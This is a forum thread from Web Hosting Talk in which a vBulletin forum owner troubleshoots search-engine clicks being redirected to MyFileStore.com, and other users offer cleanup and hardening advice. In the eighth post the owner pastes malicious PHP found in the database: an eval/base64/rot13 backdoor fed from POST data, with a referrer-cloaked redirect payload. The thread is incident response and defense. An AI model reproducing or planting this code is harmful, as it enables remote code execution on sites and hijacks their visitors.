hosted by liquidweb


Go Back   Web Hosting Talk : Web Hosting Main Forums : Web Design and Content : vbulletin/vbseo hacked?
Reply

Forum Jump

vbulletin/vbseo hacked?

Reply Post New Thread In Web Design and Content Subscription
 
Send news tip View All Posts Thread Tools Search this Thread Display Modes
  #1  
Old
Newbie
 
Join Date: May 2011
Posts: 15

vbulletin/vbseo hacked?


Hello,

i have very strange problem with my vbulletin board (3.8.7). The problem is Google Re-Direct clicks to my forum to MyFileStore.com. I read everything on vbseo and vbulletin boards and reinstalled vbseo, which is supposedly causing the problem. But today the problem came back.

Any ideas?



Sponsored Links
  #2  
Old
Junior Guru Wannabe
 
Join Date: Feb 2012
Posts: 60
Have you tried contacting vb about the issue? There may be a known exploit that they have a security patch for

  #3  
Old
Technical Nutcase
 
Join Date: Mar 2009
Location: Miami, Florida
Posts: 18,687
Hello,
Are you sure it is not an issue with your machine? I have seen rogue anti-viruses and adware re-direct google searches. Can you try it on another computer?

__________________
http://KMyers.me

Sponsored Links
  #4  
Old
Aspiring Evangelist
 
Join Date: Aug 2005
Location: behind my screen
Posts: 402
this sounds like that vbSeo exploit from months ago are you sure you run the latest availible versions ?

  #5  
Old
Newbie
 
Join Date: May 2011
Posts: 15
Quote:
Originally Posted by cpanellover View Post
this sounds like that vbSeo exploit from months ago are you sure you run the latest availible versions ?
I thought the same, so i reinstalled Vbseo three days ago. But today i saw the redirection again.

  #6  
Old
Web Hosting Master
 
Join Date: Aug 2011
Posts: 720
There is Support section in vbseo. So you can discuss your problem there. I am agree with KMyers. There are some free software and anti virus which re-direct google searches to a particular sites.

  #7  
Old
Aspiring Evangelist
 
Join Date: Aug 2005
Location: behind my screen
Posts: 402
hi,

1)check vbulletin.com for security patches
2)temporarly disable custom plugins
3) redirection gone ? good not gone ? well.....
4)you have a problem on the server that needs to be investigated by somebody with full access

  #8  
Old
Newbie
 
Join Date: May 2011
Posts: 15
My admin just found this code in MySQL (datastore, plugins)

Code:
if(isset($_POST[$x]))eval(base64_decode(str_rot13($_POST[$x])));unset($x);
ini_set('display_errors',0);ini_set('log_errors',0);
$r=!empty($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : getenv('HTTP_REFERER');
if(strlen($r)>10)
{
$ip=$_SERVER['REMOTE_ADDR'];$hn=@gethostbyaddr($ip);
if((strpos($ip,'65.55.')!==0)&&(strpos($hn,'msnbot')===false))
{
        $s=array('search.live.com','www.google','search.yahoo.com','www.bing.com','yandex.ru','baidu.com');
        foreach($s as $e)
        {
                if((strpos($r,$e)!==false)&&(empty($_COOKIE['vbsp'])))
                {
                        $h=strtoupper(substr(@md5($_SERVER['HTTP_HOST']),0,8));
                        die("<html><head></head><body><script type=\"text/javascript\">var vbsp='$h';".str_replace('\\','\\\\',gzinflate(base64_decode('XVLbctowFPwVmpmOpLFDuBgMcd1MQqBN703avlhqRwgBDmAcYy6J5X/vihQmU9vHZ7V7LvsgvZFzOl

Is this related to any known issue?

  #9  
Old
Aspiring Evangelist
 
Join Date: Aug 2005
Location: behind my screen
Posts: 402
that is exploit code disable base64_encode and base64_decode PHP functions in php.ini do remember that vBulletin uses those itself on upgrades/installs so you need to renable them if you are going to upgrade/install also "register_globals = off" in php.ini restart the server after editing php.ini the "@" you see before PHP functions calls cause that script to throw no errormessage if the function fails.Also have you seen this

http://www.vbseo.com/f5/vbseo-securi...3/index12.html


Last edited by cpanellover; 02-29-2012 at 01:35 PM.
  #10  
Old
Newbie
 
Join Date: May 2011
Posts: 15
1.) So if this "virus code" is in "datastore", then if i disable/enable any plugin, datastore will be cleared and "virus code" will vanish?

2.) But from what i understand, it will come back and attach "virus code" again. So how do i find it source and delete it completely?

Do i understand that correctly?


Last edited by mikewiz; 02-29-2012 at 03:01 PM.
  #11  
Old
Aspiring Evangelist
 
Join Date: Aug 2005
Location: behind my screen
Posts: 402
Quote:
Originally Posted by mikewiz View Post
1.) So if this "virus code" is in "datastore", then if i disable/enable any plugin, datastore will be cleared and "virus code" will vanish?

2.) But from what i understand, it will come back and attach "virus code" again. So how do i find it source and delete it completely?

Do i understand that correctly?
The best thing you can do is contact vBulletin support the creators of the product are the most qualified to tell you howto deal with this.It's possible it comes back but be carefull with the datastore if you do anything wrong it might corrupt your database and your board will stop working.Ask Steve at vbulletin.com he is verry smart with things like this.it might not be vbSeo look here what yui library version are you running ? try in your vBulletin control panel

  1. Admin CP >> Settings >> Options >> Server Settings and Optimization Options
  2. Scroll down to Use Remote YUI
  3. Set this to Google


Last edited by cpanellover; 02-29-2012 at 03:16 PM.
  #12  
Old
Junior Guru Wannabe
 
Join Date: Mar 2012
Posts: 33
Also have a check on your .htaccess file.
It might be vulnerable.

Reply

Similar Threads
Thread Thread Starter Forum Replies Last Post
vBSEO and vBulletin teck Software & Scripts Offers 17 04-08-2011 02:18 AM
vbulletin + vbseo managed hosting. IsMaR Managed Hosting and Services 15 11-06-2010 11:22 PM
vBSEO and vBulletin Owned License for Sale (with +2 years upgrades & vBulletin Blogs) NameRegion Software & Scripts Offers 12 11-08-2008 10:50 AM
vBulletin + vbSEO + drupal vjai Dedicated Server 10 02-26-2008 10:37 PM
vBulletin and vBSEO - best host ? vjai Web Hosting 16 02-24-2008 02:15 PM

Related posts from TheWhir.com
Title Type Date Posted
HostGator Says Reports of a Server Breach by CaLLSTaCK are a Hoax Web Hosting News 2014-10-23 11:57:54
Hackers Steal User Login Information from AVAST Anti-Virus Forum Web Hosting News 2014-05-27 13:46:25
GCHQ, Not NSA, Behind Belgian Telecom Attack: Report Web Hosting News 2014-05-01 08:22:23
Could Website Hackers be Chasing Hosting Customers Away? Blog 2013-08-27 09:07:42
Syrian Electronic Army Targets Top US Media Websites in Outbrain Platform Hack Web Hosting News 2013-08-16 10:46:10


Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes
Postbit Selector

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off

Forum Jump
Login:
Log in with your username and password
Username:
Password:



Forgot Password?
WHT Host Brief Email:

We respect your privacy. We will never sell, rent, or give away your address to any outside party, ever.

Advertisement:
Web Hosting News:
WHT Membership
WHT Membership



 

X

Welcome to WebHostingTalk.com

Create your username to jump into the discussion!

WebHostingTalk.com is the largest, most influentual web hosting community on the Internet. Join us by filling in the form below.


(4 digit year)

Already a member?